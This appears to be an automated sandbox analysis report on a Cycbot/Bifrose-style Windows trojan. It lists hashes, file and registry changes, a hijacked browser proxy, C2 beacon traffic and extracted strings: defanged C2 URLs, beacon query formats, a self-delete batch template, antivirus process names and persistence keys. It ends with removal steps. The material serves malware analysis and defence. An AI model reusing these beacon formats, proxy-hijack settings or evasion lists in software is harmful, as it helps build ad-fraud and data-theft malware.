MD5: c2133288756013492b5a70929f095902
SHA1: d2be77185fa10147bd44b1e7caa15a0b459c8b52
SHA256: 5c80b80f9bd128b70fd5ad5a6b3f12699ff980074204ad3dceabd57e9f917319
SSDeep: 3072:mBIYw3CDnYCZyzGw/kgX7oKwVaKJ4Wu1pizri7Yqx3vlzAofQTYHhlsJ8:mBoAKGw/kgXs3JIpizO7nx3vlE QTEhb
Size: 191488 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2005-11-13 19:02:59
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:3724
%original file name%.exe:3956

The Trojan injects its code into the following process(es):

%original file name%.exe:3576

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3576 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\AAD36\6C10.AD3 (2672 bytes)

Registry activity

The process %original file name%.exe:3576 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\c2133288756013492b5a70929f095902_RASMANCS]
"MaxFileSize" = "1048576"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Rpc]
"UuidSequenceNumber" = "134429773"

[HKLM\SOFTWARE\Microsoft\Tracing\c2133288756013492b5a70929f095902_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\c2133288756013492b5a70929f095902_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\c2133288756013492b5a70929f095902_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\c2133288756013492b5a70929f095902_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
"ProxyServer" = "http=127.0.0.1:64121"

[HKLM\SOFTWARE\Microsoft\Tracing\c2133288756013492b5a70929f095902_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\c2133288756013492b5a70929f095902_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 03 00 00 00 14 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\c2133288756013492b5a70929f095902_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0A 00 00 00 03 00 00 00 14 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\c2133288756013492b5a70929f095902_RASAPI32]
"EnableFileTracing" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyOverride"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://classicbattletech.com/lhous5.gif?pr=gJ4WK/SUh/TNhRMw9YLJ+MSTUivqg4b0xZNaK+/bxWq1SfkIYQAE	67.192.254.201
www.google.com

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Bifrose/Cycbot Checkin 2

Traffic

GET /lhous5.gif?pr=gJ4WK/SUh/TNhRMw9YLJ+MSTUivqg4b0xZNaK+/bxWq1SfkIYQAE HTTP/1.0

Connection: close

Host: classicbattletech.com

Accept: */*

User-Agent: chrome/9.0

HTTP/1.1 301 Moved Permanently

Date: Tue, 15 Nov 2016 08:53:22 GMT

Server: Apache

Location: hXXp://bg.battletech.com/lhous5.gif?pr=gJ4WK/SUh/TNhRMw9YLJ+MSTUivqg4b0xZNaK+/bxWq1SfkIYQAE

Content-Length: 380

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://bg.battletech.com/lhous5.gif?pr=g
J4WK/SUh/TNhRMw9YLJ+MSTUivqg4b0xZNaK+/bxWq1SfkIYQAE">here
</a>.</p>.<hr>.<address>Apache Server at class
icbattletech.com Port 80</address>.</body></html>...

The Trojan connects to the servers at the folowing location(s):

`.rsrc

.xX{Whlj

SSj%S

<%u,V

<3%u1f

xSSSh

FTPjKS

FtPj;S

C.PjRV

Error %d: Cannot open file %s

Processing %d%% completed

All files *.*|*.*

XML file *.*|*.xml

Error write file %s

Error read file %s

Disk %d is full

Cannot save file %s

HKEY_CURRENT_USER\Software\%s

\Windows NT

Software\Microsoft\Windows\CurrentVersion\Run

explorer.exe,%s

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

Software\Microsoft\Windows NT\CurrentVersion\Windows

operator

GetProcessWindowStation

portuguese-brazilian

deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler

1.2.5

>`Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

inflate 1.2.5 Copyright 1995-2010 Mark Adler

{A1D429DE-B782-4253-84AD-6E09A8438AD5}

{35BCA615-C82A-4152-8857-BCC626AE4C8D}

{4D92BB9F-9A66-458f-ACA4-66172A7016D4}

lvvm.exe

{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}

{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}

{6B985724-623F-492e-B0D6-C9715ADE853B}

{B37C48AF-B05C-4520-8B38-2FE181D5DC78}

{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}

Advapi32.dll

%s%s_1

%s_0_%d_%s

%s_%d

%s_%d_%d_%d_%d

%s_%s

hXXp://

POST %s HTTP/1.1

Host: %s

User-Agent: mozilla/2.0

Content-Length: %u

POST hXXp://%s%s HTTP/1.1

HTTP/1.0 200 OK

HTTP/1.1 200 OK

%s.%s

stor.cfg

exec%s

id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=108

%s_%s_%d

_1_%d

_2_%d

_3_%d

_4_%d

hXXp://maildbaccesss.com

hXXp://storetabletpcforme.com

hXXp://seeworldonlines.com

hXXp://missisipitour.com

hXXp://adreklamaforyou.com

hXXp://calcfordelis.com

hXXp://stotre4image.com

hXXp://allsoft4you.com

hXXp://videocontainer.com

hXXp://maxtroeurosys.com

SELECT_RESERV_SRV_%d

%s_%d_%s

id=%s&c=%d

%s_%d_%d_%d

%s_%d_%d

%s %s

%s start%s%c%s

c1.exe

c2.exe

c3.exe

%sq=%s

DWN_CON_STRP_%d_%s

hXXp://%d.ctrl.%s

logo.png

img/135.png

img/136.png

t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d

t=%s&q=&s=%d&hrs=%d

%s/%s?tq=%s&pr=%d

%s:%d/%s?tq=%s&pr=%d

hXXp://armoredlegion.com/305986.png

hXXp://armoredlegion.com/16354.png

hXXp://armoredlegion.com/716354_m61.png

hXXp://mektek.net/thelab/wiley.jpg

hXXp://knowledgesutra.com/img/temp/hi.cgi

hXXp://knowledgesutra.com/img/temp/head.png

hXXp://battleon.com/134.gif

hXXp://battleon.com/132.gif

hXXp://battleon.com/133.gif

hXXp://browsermmorpg.com/images/cpc.png

hXXp://browsermmorpg.com/images/cpc2.png

hXXp://browsermmorpg.com/img/intel.gif

hXXp://browsermmorpg.com/img/intel.jpg

hXXp://012webpages.com/christian12.jpg

hXXp://012webpages.com/christian13.jpg

hXXp://012webpages.com/christian14.jpg

hXXp://tri-countymech.com/g/livechat.png

hXXp://tri-countymech.com/g/logo.png

hXXp://tri-countymech.com/g/133.jpg

hXXp://tri-countymech.com/g/134.jpg

hXXp://electronicstheory.com/pics/valley.png

hXXp://electronicstheory.com/pics/sun.png

hXXp://classicbattletech.com/lhous3.gif

hXXp://classicbattletech.com/lhous4.gif

hXXp://classicbattletech.com/lhous5.gif

hXXp://classicbattletech.com/lhous6.gif

hXXp://engineeringcrossing.com/images/misc/23525.png

hXXp://engineeringcrossing.com/images/misc/64646.png

t=t&hrs=%d&q=id=1000&ver=%s&s=%d

t=ip&hrs=%d&q=&s=1

%s?pr=%s

\bl%d_64.bat

del "%s"

if exist "%s" goto a

cmd.exe /c "%s"

%s.zl

{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d

{C66E79CE-8935-4ed9-A6B1-4983619CB925}

{61B98B86-5F44-42b3-BCA1-33904B067B81}

{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}

GET %s HTTP/1.0

drweb

{5A92A751-F926-4BB9-872E-BEC4A4CD571F}

ldr.ini

reportfrommains.com

hXXp://%s/s.php?c=121&id=%s

onlinereportsystem.com

%s_1_%d_%s

%s_2_%d_%s

%s_3_%d_%s

%s_4_%d_%s

pmv=2&id=%s&hwid=%s

u.exe

%s up%s

&%s=%s

avgnt.exe

AVGIDSAgent.exe

avgwdsvc.exe

ccsvchst.exe

AvastUI.exe

mcagent.exe

PRM_LSTN_THIS_PORT

127.0.0.1

HTTP/1.x

google.com

hXXp://VVV.google.com

HTTP/1.1 302 Found

Location: %s

id=%s&type=%d&ppcid=%s

%s: %s

%s_5_%s

http=127.0.0.1:

prefs.js

Mozilla

"network.proxy.http"

"network.proxy.http_port"

"network.proxy.type"

"127.0.0.1"

%s(%s, %s);

operaprefs.ini

Opera

Use HTTP

HTTP server

127.0.0.1:%s

%s=%s

%s:%s

%s\%s

hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s

id=%s&hwid=%s

exec|%s

http=

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

bing.com

yahoo.com

search.aol.

suche.aol.

searcht2.aol.

.yimg.com

.bing.net

scorecardresearch.com

brightcove.com

.aol.

.atwola.

.ivwbox.

.google

.atdmt.

.abmr.

.tacoda.

.adtechus.

.autodatadirect.

.mapquestapi.

.ggpht.

.virtualearth.

.opera.

.microsoft.

.wsod.

.doubleclick.

.ypcdn.

.truveo.

.tlowdb.

mapq.st

.dartsearch.

.thawte.

http://

bing.com/search

search.yahoo.com/search

%s_1_%s

err%d%s_%d_%d

err0%s_%d_%d

&useragent=%s

&referer=%s

&type=%d

%s:443/?ver=108&system=%d&id=%s&hwid=%s&search=%s

%s_2_%s

%s_%s_%s

%s_3_%s

VVV.VVV.ru

hXXps://

.doubleclick.net

doubleclick.net

msn.com

%s_0%d_%d

=='undefined'?'%s':'%s'

.referrer

HTTP/1.0

User-Agent: chrome/9.0

%s %s %s

hXXp://VVV.google.com/

hXXp://VVV.yahoo.com/

.class

.midi

google_ad.url

google_ad.title

r.msn.com

google_ad.line1

zcÁ

%Program Files%\36C10

C:\Users\"%CurrentUserName%"\AppData\Roaming\AAD36

%Program Files%\LP\1A7A

c:\%original file name%.exe

6C10.AD3

GetProcessHeap

GetCPInfo

RegFlushKey

RegCloseKey

RegOpenKeyExA

keybd_event

WinHttpReadData

WinHttpOpenRequest

WinHttpOpen

WinHttpQueryDataAvailable

WinHttpCloseHandle

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpConnect

.text

`.rdata

@.data

.rsrc

}.old:

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

KERNEL32.DLL

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

RASAPI32.dll

RPCRT4.dll

SHELL32.dll

SHLWAPI.dll

USER32.dll

WINHTTP.dll

WININET.dll

WS2_32.dll

mscoree.dll

nKERNEL32.DLL

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

Dr.Web

mhttp=127.0.0.1:%d

hXXp://VVV.yahoo.com

2.0.2.1

%original file name%.exe_3576_rwx_00255000_00001000:

C:\Windows\system32\NSI.dll

C:\Windows\system32\Normaliz.dll

C:\Windows\system32\iertutil.dll

%original file name%.exe

C:\Windows\system32\RASAPI32.dll

%original file name%.exe_3576_rwx_00400000_00051000:

`.rsrc

.xX{Whlj

SSj%S

<%u,V

<3%u1f

xSSSh

FTPjKS

FtPj;S

C.PjRV

Error %d: Cannot open file %s

Processing %d%% completed

All files *.*|*.*

XML file *.*|*.xml

Error write file %s

Error read file %s

Disk %d is full

Cannot save file %s

HKEY_CURRENT_USER\Software\%s

\Windows NT

Software\Microsoft\Windows\CurrentVersion\Run

explorer.exe,%s

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

Software\Microsoft\Windows NT\CurrentVersion\Windows

operator

GetProcessWindowStation

portuguese-brazilian

deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler

1.2.5

>`Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

inflate 1.2.5 Copyright 1995-2010 Mark Adler

{A1D429DE-B782-4253-84AD-6E09A8438AD5}

{35BCA615-C82A-4152-8857-BCC626AE4C8D}

{4D92BB9F-9A66-458f-ACA4-66172A7016D4}

lvvm.exe

{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}

{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}

{6B985724-623F-492e-B0D6-C9715ADE853B}

{B37C48AF-B05C-4520-8B38-2FE181D5DC78}

{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}

Advapi32.dll

%s%s_1

%s_0_%d_%s

%s_%d

%s_%d_%d_%d_%d

%s_%s

hXXp://

POST %s HTTP/1.1

Host: %s

User-Agent: mozilla/2.0

Content-Length: %u

POST hXXp://%s%s HTTP/1.1

HTTP/1.0 200 OK

HTTP/1.1 200 OK

%s.%s

stor.cfg

exec%s

id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=108

%s_%s_%d

_1_%d

_2_%d

_3_%d

_4_%d

hXXp://maildbaccesss.com

hXXp://storetabletpcforme.com

hXXp://seeworldonlines.com

hXXp://missisipitour.com

hXXp://adreklamaforyou.com

hXXp://calcfordelis.com

hXXp://stotre4image.com

hXXp://allsoft4you.com

hXXp://videocontainer.com

hXXp://maxtroeurosys.com

SELECT_RESERV_SRV_%d

%s_%d_%s

id=%s&c=%d

%s_%d_%d_%d

%s_%d_%d

%s %s

%s start%s%c%s

c1.exe

c2.exe

c3.exe

%sq=%s

DWN_CON_STRP_%d_%s

hXXp://%d.ctrl.%s

logo.png

img/135.png

img/136.png

t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d

t=%s&q=&s=%d&hrs=%d

%s/%s?tq=%s&pr=%d

%s:%d/%s?tq=%s&pr=%d

hXXp://armoredlegion.com/305986.png

hXXp://armoredlegion.com/16354.png

hXXp://armoredlegion.com/716354_m61.png

hXXp://mektek.net/thelab/wiley.jpg

hXXp://knowledgesutra.com/img/temp/hi.cgi

hXXp://knowledgesutra.com/img/temp/head.png

hXXp://battleon.com/134.gif

hXXp://battleon.com/132.gif

hXXp://battleon.com/133.gif

hXXp://browsermmorpg.com/images/cpc.png

hXXp://browsermmorpg.com/images/cpc2.png

hXXp://browsermmorpg.com/img/intel.gif

hXXp://browsermmorpg.com/img/intel.jpg

hXXp://012webpages.com/christian12.jpg

hXXp://012webpages.com/christian13.jpg

hXXp://012webpages.com/christian14.jpg

hXXp://tri-countymech.com/g/livechat.png

hXXp://tri-countymech.com/g/logo.png

hXXp://tri-countymech.com/g/133.jpg

hXXp://tri-countymech.com/g/134.jpg

hXXp://electronicstheory.com/pics/valley.png

hXXp://electronicstheory.com/pics/sun.png

hXXp://classicbattletech.com/lhous3.gif

hXXp://classicbattletech.com/lhous4.gif

hXXp://classicbattletech.com/lhous5.gif

hXXp://classicbattletech.com/lhous6.gif

hXXp://engineeringcrossing.com/images/misc/23525.png

hXXp://engineeringcrossing.com/images/misc/64646.png

t=t&hrs=%d&q=id=1000&ver=%s&s=%d

t=ip&hrs=%d&q=&s=1

%s?pr=%s

\bl%d_64.bat

del "%s"

if exist "%s" goto a

cmd.exe /c "%s"

%s.zl

{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d

{C66E79CE-8935-4ed9-A6B1-4983619CB925}

{61B98B86-5F44-42b3-BCA1-33904B067B81}

{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}

GET %s HTTP/1.0

drweb

{5A92A751-F926-4BB9-872E-BEC4A4CD571F}

ldr.ini

reportfrommains.com

hXXp://%s/s.php?c=121&id=%s

onlinereportsystem.com

%s_1_%d_%s

%s_2_%d_%s

%s_3_%d_%s

%s_4_%d_%s

pmv=2&id=%s&hwid=%s

u.exe

%s up%s

&%s=%s

avgnt.exe

AVGIDSAgent.exe

avgwdsvc.exe

ccsvchst.exe

AvastUI.exe

mcagent.exe

PRM_LSTN_THIS_PORT

127.0.0.1

HTTP/1.x

google.com

hXXp://VVV.google.com

HTTP/1.1 302 Found

Location: %s

id=%s&type=%d&ppcid=%s

%s: %s

%s_5_%s

http=127.0.0.1:

prefs.js

Mozilla

"network.proxy.http"

"network.proxy.http_port"

"network.proxy.type"

"127.0.0.1"

%s(%s, %s);

operaprefs.ini

Opera

Use HTTP

HTTP server

127.0.0.1:%s

%s=%s

%s:%s

%s\%s

hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s

id=%s&hwid=%s

exec|%s

http=

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

bing.com

yahoo.com

search.aol.

suche.aol.

searcht2.aol.

.yimg.com

.bing.net

scorecardresearch.com

brightcove.com

.aol.

.atwola.

.ivwbox.

.google

.atdmt.

.abmr.

.tacoda.

.adtechus.

.autodatadirect.

.mapquestapi.

.ggpht.

.virtualearth.

.opera.

.microsoft.

.wsod.

.doubleclick.

.ypcdn.

.truveo.

.tlowdb.

mapq.st

.dartsearch.

.thawte.

http://

bing.com/search

search.yahoo.com/search

%s_1_%s

err%d%s_%d_%d

err0%s_%d_%d

&useragent=%s

&referer=%s

&type=%d

%s:443/?ver=108&system=%d&id=%s&hwid=%s&search=%s

%s_2_%s

%s_%s_%s

%s_3_%s

VVV.VVV.ru

hXXps://

.doubleclick.net

doubleclick.net

msn.com

%s_0%d_%d

=='undefined'?'%s':'%s'

.referrer

HTTP/1.0

User-Agent: chrome/9.0

%s %s %s

hXXp://VVV.google.com/

hXXp://VVV.yahoo.com/

.class

.midi

google_ad.url

google_ad.title

r.msn.com

google_ad.line1

zcÁ

%Program Files%\36C10

C:\Users\"%CurrentUserName%"\AppData\Roaming\AAD36

%Program Files%\LP\1A7A

c:\%original file name%.exe

6C10.AD3

GetProcessHeap

GetCPInfo

RegFlushKey

RegCloseKey

RegOpenKeyExA

keybd_event

WinHttpReadData

WinHttpOpenRequest

WinHttpOpen

WinHttpQueryDataAvailable

WinHttpCloseHandle

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpConnect

.text

`.rdata

@.data

.rsrc

}.old:

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

KERNEL32.DLL

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

RASAPI32.dll

RPCRT4.dll

SHELL32.dll

SHLWAPI.dll

USER32.dll

WINHTTP.dll

WININET.dll

WS2_32.dll

mscoree.dll

nKERNEL32.DLL

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

Dr.Web

mhttp=127.0.0.1:%d

hXXp://VVV.yahoo.com

2.0.2.1

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:3724
   %original file name%.exe:3956

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (9 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\AAD36\6C10.AD3 (2672 bytes)

4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
5. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.